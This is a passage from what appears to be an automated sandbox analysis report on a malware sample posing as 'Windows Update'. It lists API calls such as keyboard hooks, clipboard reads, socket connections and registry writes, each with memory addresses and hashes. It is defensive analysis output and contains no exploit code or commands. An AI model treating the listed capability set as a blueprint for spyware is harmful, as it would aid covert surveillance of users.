                                                                                  • Opcode Fuzzy Hash: 617146458d2b5eccb6f6b3098fb53e13dc35f2a410a4bde4d68013564b897fb9
                                                                                  • Instruction Fuzzy Hash: 9811B272400304EFEB21DF51CC85F97FBDCEF05320F14856AEA09DB241D674AA448AB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00646622
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CertCertificateChainPolicyVerify
                                                                                  • String ID:
                                                                                  • API String ID: 3930008701-0
                                                                                  • Opcode ID: 2a78a1fa7a73db3e52dd73c16fbbab45b3d4985c5ab68fc3f9bc6ae4bd38b58b
                                                                                  • Instruction ID: f2bae14a01f79fd4fcddd1fbe2fa1171bd1c3ccef80d918e56994c048be2ce35
                                                                                  • Opcode Fuzzy Hash: 2a78a1fa7a73db3e52dd73c16fbbab45b3d4985c5ab68fc3f9bc6ae4bd38b58b
                                                                                  • Instruction Fuzzy Hash: 2511E3B1500300EFFB20CF15DC85FAAFBA8EF05720F14846AFD098A641D675A944CB72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011A6CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: e65787e813ba20e9f2cec096731d1825c2e732a0f127834e923117d995b0018f
                                                                                  • Instruction ID: bf43a9e5581f6df34c8f9c96b525ef24cab3fa953e59a2e054298fead618c1dd
                                                                                  • Opcode Fuzzy Hash: e65787e813ba20e9f2cec096731d1825c2e732a0f127834e923117d995b0018f
                                                                                  • Instruction Fuzzy Hash: 63214A7140A3C49FE7138B259C54A92BFB4DF07624F0980DBDD848B1A3D2655948D772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • OleGetClipboard.OLE32(?,00000E40,?,?), ref: 00640142
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard
                                                                                  • String ID:
                                                                                  • API String ID: 220874293-0
                                                                                  • Opcode ID: 6667a892f84c3a584e5024958ecb5721dd4c62b987c4a132fe43a5d912e4b342
                                                                                  • Instruction ID: 77fdae8488b8bd87cc93d1b4b854237a991d35aecb86f0bc421a42513492c7e8
                                                                                  • Opcode Fuzzy Hash: 6667a892f84c3a584e5024958ecb5721dd4c62b987c4a132fe43a5d912e4b342
                                                                                  • Instruction Fuzzy Hash: E4119471905340AFE3118B16DC41F36BFB8EF86620F19819AED489B692D225B915CBB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • getsockname.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640EFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getsockname
                                                                                  • String ID:
                                                                                  • API String ID: 3358416759-0
                                                                                  • Opcode ID: 00e7234f5156e8bbf63f1330d227b70dc2491ed8d15ab262f54246e52ec87560
                                                                                  • Instruction ID: 35ba8d1dad2d0b5e748f373bd800130a8fb872b922b48f61e713cff5fbeec353
                                                                                  • Opcode Fuzzy Hash: 00e7234f5156e8bbf63f1330d227b70dc2491ed8d15ab262f54246e52ec87560
                                                                                  • Instruction Fuzzy Hash: B7118271500304EFF720CF55DC85F96FB98EF04760F148466EE099B641D674A945CA75
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0011A61A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 70dbbd8fedec3ddbb165f64385c0c354b2b2ecbee870f248cca01d29ecc8c56d
                                                                                  • Instruction ID: c01261e0c757da5ca3657a5f97c5b903c05de7afe42f81e8c0ec5272c5386d04
                                                                                  • Opcode Fuzzy Hash: 70dbbd8fedec3ddbb165f64385c0c354b2b2ecbee870f248cca01d29ecc8c56d
                                                                                  • Instruction Fuzzy Hash: 80118471409380AFDB228F51DC44B62FFF4EF46310F0884DAED858B562C376A418DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegSetValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00644B68
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: 19a93e46416e1840692b4f70731849c23e3c90075e3f19e91eb1bb0986b1e4a9
                                                                                  • Instruction ID: 02221ac47d3740a591d83997bb306399938da3b4a5be5c8bf0fc68727f2bc021
                                                                                  • Opcode Fuzzy Hash: 19a93e46416e1840692b4f70731849c23e3c90075e3f19e91eb1bb0986b1e4a9
                                                                                  • Instruction Fuzzy Hash: 7E11C172500700EFFB219F11CC45FA7FBA8EF04710F04855AEE459A651CA71E904CA71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011BF31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: 0dc1e8f6cadc3c0b67a82e709d7038ecad3982defd31b3c788e6f2f837ef30b8
                                                                                  • Instruction ID: 6404d54b94d336cdac5c1488b20587ffb25514642fc636899a33353b9e4f1cb2
                                                                                  • Opcode Fuzzy Hash: 0dc1e8f6cadc3c0b67a82e709d7038ecad3982defd31b3c788e6f2f837ef30b8
                                                                                  • Instruction Fuzzy Hash: 1B11E372404700EFEB21CF51DC85FA6FBA8EF04720F1485AAFD099A151C775A945CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 0011A3D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ForegroundWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2020703349-0
                                                                                  • Opcode ID: eb0f7ee92b0a449b6e4c3777c292eb1f1923bbc21d8d024fb04b241f844728ec
                                                                                  • Instruction ID: c67722a8a6d4037a1620063edf0ef7dd3981f8556f76531bc8130ec5cfa05d72
                                                                                  • Opcode Fuzzy Hash: eb0f7ee92b0a449b6e4c3777c292eb1f1923bbc21d8d024fb04b241f844728ec
                                                                                  • Instruction Fuzzy Hash: 821182754093C09FE7128B21DC44BA2BFA4EF53224F0980EBED848F263D2795949D7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 5ac0911813b7797a4805f23a40231082e6e8d07f332783495ed91613d7171267
                                                                                  • Instruction ID: 474c9022159523cecd79d1fb84bb3e5148380b7e4507467737b035ccada85f35
                                                                                  • Opcode Fuzzy Hash: 5ac0911813b7797a4805f23a40231082e6e8d07f332783495ed91613d7171267
                                                                                  • Instruction Fuzzy Hash: 6711BE755097C09FDB228B25DC85B52BFB4EF06224F0984DFED858F663C265A808DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetFileAttributesW.KERNEL32(?,?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00644C1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 28ada0963fa7f52508781b1e3ba449f882085cc9644b685b532ff5ed66f5b357
                                                                                  • Instruction ID: 0750cd7e66760a2bccb295c1df4f327403baed19430299c531640ff7044077f6
                                                                                  • Opcode Fuzzy Hash: 28ada0963fa7f52508781b1e3ba449f882085cc9644b685b532ff5ed66f5b357
                                                                                  • Instruction Fuzzy Hash: D311B6715053809FDB11CF25DC85B96BFE8EF06220F0984EAED49CB252D235A844CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640FDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3577187118-0
                                                                                  • Opcode ID: e11df48c93611b72335f6ce7c2b0c282309e6228658aa7fee476640f93bf140e
                                                                                  • Instruction ID: 77a696079368e067dfae894a4c451da41d7e0d6e9696a9e941c068fec90b96c8
                                                                                  • Opcode Fuzzy Hash: e11df48c93611b72335f6ce7c2b0c282309e6228658aa7fee476640f93bf140e
                                                                                  • Instruction Fuzzy Hash: C7112571500340EFFB21CF10CC85FAAFBA8EF04720F14846AEE089B241C675A944CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: Atom
• String ID:
• API String ID: 2154973765-0
• Opcode ID: 7c7c4384d0bc1de07df62e3e2a2dcdf6cd6825092ebcdce8606f3b1b6b348e4d
• Instruction ID: 17dd3700a2fe820f2b6986de5c86b6b42cccd9d52c3fb1a1da04cbe54c3eb8f5
• Opcode Fuzzy Hash: 7c7c4384d0bc1de07df62e3e2a2dcdf6cd6825092ebcdce8606f3b1b6b348e4d
• Instruction Fuzzy Hash: 581194715093809FD712CB15DC95B92BFA8EF06224F0880DBED898F653D275A848CB62
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00645BAC
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 5752946eccd535afb9252eb1e7a2e350bcd8a180b701f3df70aa6d18685a7af8
• Instruction ID: cd0bdd96871edfb43683372ea47f8fa0f835a7da8af5a10c9d51fca2cdb52aa9
• Opcode Fuzzy Hash: 5752946eccd535afb9252eb1e7a2e350bcd8a180b701f3df70aa6d18685a7af8
• Instruction Fuzzy Hash: 11119D711097C09FD7128B25DC55B92BFF4EF42220F1884EAED898B663C265A848CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetAdaptersAddresses.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006430AD
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: AdaptersAddresses
• String ID:
• API String ID: 2506852604-0
• Opcode ID: 81aafeeefeb47482ab0af83c4231bf9517474530240a08c8a57f4397b343d481
• Instruction ID: bf2ccc816564710faddcb7d8bdf26ff3679189e46da6acfd284966be43ac64d5
• Opcode Fuzzy Hash: 81aafeeefeb47482ab0af83c4231bf9517474530240a08c8a57f4397b343d481
• Instruction Fuzzy Hash: 0011E571100704EFFB218F41DC45FAAFBA8EF04B20F14855AFE495A251C671EA49CBB2
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(?,00000E40), ref: 00644563
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 37ffd06030bcf0fae757d26bba3a43196b6b3de7a34bc78bb3617dd87cc77433
• Instruction ID: 82f8959a3559e2af2a746200ab5c70810d59aff9096890b6e01008e2f6c1938c
• Opcode Fuzzy Hash: 37ffd06030bcf0fae757d26bba3a43196b6b3de7a34bc78bb3617dd87cc77433
• Instruction Fuzzy Hash: 15110471500300EFFB20DF15DC86FB6FBA8DF04720F14809AFE485A281D6B5AA48CA61
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
• Opcode ID: 3bcdec447006df79a2a0ef1bcde06ed1e8dcb758ce04e950d7daeed28fc831c3
• Instruction ID: 0c5e38f58cf98f74fe956b5f5a92670903407cb81290fd18a2e82221eebc0d57
• Opcode Fuzzy Hash: 3bcdec447006df79a2a0ef1bcde06ed1e8dcb758ce04e950d7daeed28fc831c3
• Instruction Fuzzy Hash: 72119175509380AFDB22CF15DD44F92FFB4EF56224F0884AAED888B552C375A858CB62
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetPerAdapterInfo.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0064319F
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: AdapterInfo
• String ID:
• API String ID: 3405139893-0
• Opcode ID: 0f959498f943b9aa4976108490f2853957a1f6b9e77138b1b0b1c79e39c0effe
• Instruction ID: d467b12c0334c77e288756ecd7f83e4c0d8b9e1b579f3c607f6e0d5f4c887863
• Opcode Fuzzy Hash: 0f959498f943b9aa4976108490f2853957a1f6b9e77138b1b0b1c79e39c0effe
• Instruction Fuzzy Hash: 3B112671100300EFFB208F01CC85FA6FBA8EF04720F14845AFD055B341D670AA04CAB2
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
• Opcode ID: 6d7c11f0d44aa680cc959849fb00ad57d8319a4dbb7badaa1f5b035404582111
• Instruction ID: cf4668eacf80d18332f4c2d2e02f82f7fcf367ee1c4d428d221ba36bd94210b1
• Opcode Fuzzy Hash: 6d7c11f0d44aa680cc959849fb00ad57d8319a4dbb7badaa1f5b035404582111
• Instruction Fuzzy Hash: ED119071405380AFDB21CF51DC44B92FFF4EF06320F0888AAED898B662C375A458DB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• RasConnectionNotificationA.RASAPI32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006435E7
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: ConnectionNotification
• String ID:
• API String ID: 1402429939-0
• Opcode ID: 0f959498f943b9aa4976108490f2853957a1f6b9e77138b1b0b1c79e39c0effe
• Instruction ID: 6091e54062cc11434852b2a507e25e6a4d62e5822d1ae74a272cdff6d073ac77
• Opcode Fuzzy Hash: 0f959498f943b9aa4976108490f2853957a1f6b9e77138b1b0b1c79e39c0effe
• Instruction Fuzzy Hash: F811D275500704EFFB209F11DC85FA6FBA8EF04720F14849AFE099B381D675AA45CAB6
Uniqueness
Uniqueness Score: -1.00%

APIs
• CopyFileW.KERNEL32(?,?,?), ref: 00645262
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 9b7668330b66db7be74251c386800c238f413099dc4e4a7944e58c296f4f0aca
• Instruction ID: cf240d8460f77218d7d790c951834f9e092eae95b7743f42922430aed76abd9f
• Opcode Fuzzy Hash: 9b7668330b66db7be74251c386800c238f413099dc4e4a7944e58c296f4f0aca
• Instruction Fuzzy Hash: 1111A1726007009FEB20CF25DC85B97FBE8EF14320F08846ADC0ADB742E671E904CA61
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,?,?,?), ref: 006427C5
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: c924603e2b79a8e603ea3a341cf7aa5491353b7ae9f807d554feb435d300b2c9
• Instruction ID: 970b7363366dd59f23fb5f974691382b4e3f410e66573d1c9f7bebe3ac990fac
• Opcode Fuzzy Hash: c924603e2b79a8e603ea3a341cf7aa5491353b7ae9f807d554feb435d300b2c9
• Instruction Fuzzy Hash: 791191715093C0AFDB228F11DC54B52FFB4EF16220F0884DAED854B663D365A818DB62
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 0225f2ca8270464d24664f9aa76bdccb6db88aeca1f5739277d8bf83e18c5230
• Instruction ID: 2c7875f1dbeaaf53964456e925da4b284b44c01fde191de80b5ee5518f7747c8
• Opcode Fuzzy Hash: 0225f2ca8270464d24664f9aa76bdccb6db88aeca1f5739277d8bf83e18c5230
• Instruction Fuzzy Hash: 3811A3725083849FE7118F15DC85A96FFA4EF06320F0884DEED858B262C275A848DB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileType.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011BD95
Memory Dump Source
• Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: c5c516620b012e5ee2f7b4c5878f0fa80c6ec1c17bebc5424553b12a3968469d
• Instruction ID: 4165842432a82d670c3d73660b04932d3dd4dcaa6e124450be816e6e7d57b94e
• Opcode Fuzzy Hash: c5c516620b012e5ee2f7b4c5878f0fa80c6ec1c17bebc5424553b12a3968469d
• Instruction Fuzzy Hash: FD01DE75504300EFFB24DF51EC85BA6FB98EF04724F1484AAEE089B281C774A9448AB2
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindClose.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00642D34
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 64ea29fd8f61b73555e7ddbd9a7e44a7a16a685c7fc11ff9579ff894a75761cf
• Instruction ID: 4bee1058cf0f8550fcffa4856dfe98c22a81b2d7661e87dfd0032f0c2267e5a1
• Opcode Fuzzy Hash: 64ea29fd8f61b73555e7ddbd9a7e44a7a16a685c7fc11ff9579ff894a75761cf
• Instruction Fuzzy Hash: CF11C8755093C49FD7228F15DC95B52FFB4EF06220F0880DBED858B253D275A908CB62
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00642131
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: ExtentPoint32Text
• String ID:
• API String ID: 223599850-0
• Opcode ID: 1039d5baa8b79dd981e3e836e577b5efed861dfac9c5fb75ced8435433fd16d4
• Instruction ID: c77024bf0bacbbbc5dd362d163c49b96083d3810cff9bc3b77aa8adb6752b371
• Opcode Fuzzy Hash: 1039d5baa8b79dd981e3e836e577b5efed861dfac9c5fb75ced8435433fd16d4
• Instruction Fuzzy Hash: BD117C71500300DFEB20CF15C885BA6FBE8EB14760F5884AAEE098B312D271E804CAA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesExW.KERNEL32(?,?,?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011BBAA
Memory Dump Source
• Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 628302c5acc3ca6642ae89c2143987673a254d028fabb4826a4a601b4440ddd4
• Instruction ID: eef7940d5867cb1cf583c3f9065342dcc0a4c8615d72490aa9e4d434e80b27d0
• Opcode Fuzzy Hash: 628302c5acc3ca6642ae89c2143987673a254d028fabb4826a4a601b4440ddd4
• Instruction Fuzzy Hash: E601C0716083008FEB24CF25DC85B96FBE4EF04320F0884BADD09CB655D771E844CA65
Uniqueness
Uniqueness Score: -1.00%

APIs
• WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00643ED6
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: Connect
• String ID:
• API String ID: 3144859779-0
• Opcode ID: 8c315047ad039747a71a545c0cb29befa968151c130757300c6aea3f337959ca
• Instruction ID: a9900e1e8b6a2a18085d0beaae6193907104bdba1ee7affd919c86782c3324a9
• Opcode Fuzzy Hash: 8c315047ad039747a71a545c0cb29befa968151c130757300c6aea3f337959ca
• Instruction Fuzzy Hash: 0E115A35500700DFEB20CF55D884B96FFE5EF04310F0888AAED498A622D371A918DB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFileAttributesW.KERNEL32(?,?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00644C1B
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 0bf06219053f49ed91976dd29aaf9bd995a798eee6daf3d0da0ca5b5c6b70cbd
• Instruction ID: 907c92be77635490f0db9faf3b62c9bfd3d281402ac1f5f4d86e0ef4aa57c9ce
• Opcode Fuzzy Hash: 0bf06219053f49ed91976dd29aaf9bd995a798eee6daf3d0da0ca5b5c6b70cbd
• Instruction Fuzzy Hash: 53019E71601340DFEB10CF29DC86BA6FBD8EF04320F0884AADD09CB742DA75E844CA61
Uniqueness
Uniqueness Score: -1.00%

APIs
• gethostname.WS2_32(?,00000E40,?,?), ref: 0011A1BD
Memory Dump Source
• Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
Similarity
• API ID: gethostname
• String ID:
• API String ID: 144339138-0
• Opcode ID: 2977488326712d6f0abb4703d40df9b971432876aefabc247b1bf13aff1ce1df
• Instruction ID: d3a48229efe2bbd1fa1098c773bb6b46fdde7d2d652ccba4ecc097dfc414c0de
• Opcode Fuzzy Hash: 2977488326712d6f0abb4703d40df9b971432876aefabc247b1bf13aff1ce1df
                                                                                  • Instruction Fuzzy Hash: D3017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D235B915CAE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWindowsHookExA.USER32(?,00000E40,?,?), ref: 006418B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: b1bbc1e522f96d30760df08a73264f0d7e47e6176f07c8a62487ac009a2db4db
                                                                                  • Instruction ID: 94e3a859b3b43b0ec31d416c789e350429faaf139e14024a388a1352e3145769
                                                                                  • Opcode Fuzzy Hash: b1bbc1e522f96d30760df08a73264f0d7e47e6176f07c8a62487ac009a2db4db
                                                                                  • Instruction Fuzzy Hash: 20017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D235B915CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000E40,?,?), ref: 0064553A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 514040917-0
                                                                                  • Opcode ID: 3d0d1c98e6cf517f3b2192d7f093522fda5c13403b4114f408803b905dbe1db9
                                                                                  • Instruction ID: c3e359d4c8a64d68cf04d7c9d2d0619424f0fb39accf08ff49269ac8297a2e2d
                                                                                  • Opcode Fuzzy Hash: 3d0d1c98e6cf517f3b2192d7f093522fda5c13403b4114f408803b905dbe1db9
                                                                                  • Instruction Fuzzy Hash: D3017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D235B915CAE5
                                                                                  Uniqueness

